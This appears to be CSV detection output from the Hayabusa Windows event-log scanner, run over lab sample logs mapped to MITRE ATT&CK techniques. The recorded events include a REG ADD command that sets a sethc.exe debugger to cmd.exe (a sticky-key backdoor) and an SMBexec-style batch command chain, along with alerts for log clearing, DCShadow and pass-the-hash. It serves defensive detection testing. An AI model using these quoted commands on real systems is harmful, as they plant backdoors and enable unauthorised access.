+2021-04-26 17:25:38.462 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.464 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.479 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.481 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:26:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:08:00.382 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
+2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
+2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
+2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
+2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
+2021-04-26 18:08:00.384 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
+2021-04-26 18:16:14.118 +09:00,srvdefender01.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1183,technique_name=Image File Execution Options Injection | CreateKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe | Process: C:\Windows\system32\reg.exe | PID: 4932 | PGUID: 5D63072B-84DE-6086-7B49-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx"
+2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1183,technique_name=Image File Execution Options Injection | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 4932 | PGUID: 5D63072B-84DE-6086-7B49-000000000C00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx"
+2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx"
+2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx"
+2021-04-26 18:17:14.111 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: REG ADD ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"" /t REG_SZ /v Debugger /d ""C:\windows\system32\cmd.exe"" /f | Path: C:\Windows\System32\reg.exe | PID: 0x1b30 | User: admmig | LID: 0x2b5f6bf",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx
+2021-04-26 18:17:37.439 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\windows\system32\cmd.exe sethc.exe 211 | Path: C:\Windows\System32\cmd.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx
+2021-04-26 18:18:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1464 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx
+2021-04-26 19:04:23.189 +09:00,srvdefender01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4656-Failed sethc replacement by CMD.evtx
+2021-04-26 23:16:45.757 +09:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\seth2c.exe | Process: C:\Windows\system32\cmd.exe | PID: 1960 | PGUID: 7CF65FC7-C199-6086-520A-000000002000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID11-New sethc file created from CMD copy.evtx
+2021-04-26 23:16:47.267 +09:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\sethc.exe | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3328 | PGUID: 7CF65FC7-CAF6-6086-930A-000000002000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID11-New sethc file created from CMD copy.evtx
+2021-04-27 00:03:05.976 +09:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\Temp\execute.bat | Process: C:\Windows\system32\cmd.exe | PID: 3492 | PGUID: 7CF65FC7-D629-6086-B70A-000000002000,rules/hayabusa/sysmon/events/11_FileCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID11,13-SMBexec service registration.evtx"
+2021-04-27 00:03:05.992 +09:00,fs02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat | LID: 0x3e7 | PID: 3068 | PGUID: 7CF65FC7-D629-6086-B80A-000000002000 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMIexec process execution.evtx
+2021-04-27 00:16:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1548 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
+2021-04-27 00:16:03.978 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x5429550,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
+2021-04-27 00:16:03.978 +09:00,srvdefender01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
+2021-04-27 00:16:03.992 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x542957e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
+2021-04-27 00:16:04.047 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\mmc.exe -Embedding | Path: C:\Windows\System32\mmc.exe | PID: 0xda4 | User: SRVDEFENDER01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
+2021-04-27 00:16:04.284 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x542a072,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
+2021-04-27 20:04:03.495 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx"
+2021-04-27 20:04:03.502 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx"
+2021-04-27 20:04:13.291 +09:00,rootdc1.offsec.lan,5136,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx"
+2021-04-27 20:04:53.341 +09:00,rootdc1.offsec.lan,5136,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx"
+2021-04-27 23:54:29.317 +09:00,webiis01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x2383c301,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:54:31.493 +09:00,pki01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x20ee2c3d,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:54:49.355 +09:00,webiis01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x2383c901,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:54:51.591 +09:00,pki01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x20ee3135,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:28.669 +09:00,mssql01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x2847721c,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:34.819 +09:00,atanids01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x74005fb3,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:45.042 +09:00,exchange01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0xb108529d,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:45.392 +09:00,adfs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x1f6f93ef,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:46.789 +09:00,fs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x26fd49db,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:47.449 +09:00,prtg-mon.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x204a9a12,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:48.746 +09:00,mssql01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x28477800,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:49.695 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x62cbf9f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:50.629 +09:00,atacore01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x369f8ca7,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:54.886 +09:00,atanids01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x740075dc,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:00:05.147 +09:00,exchange01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0xb1086cfb,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:00:05.466 +09:00,adfs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x1f6f9930,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:00:06.878 +09:00,fs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x26fd4ec6,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:00:07.557 +09:00,prtg-mon.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x204aa3a4,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:00:09.605 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x62cf99e,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:00:10.730 +09:00,atacore01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x369f96be,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:17.723 +09:00,fs02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x3902ac4,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:17.762 +09:00,dhcp01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x5df84d08,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
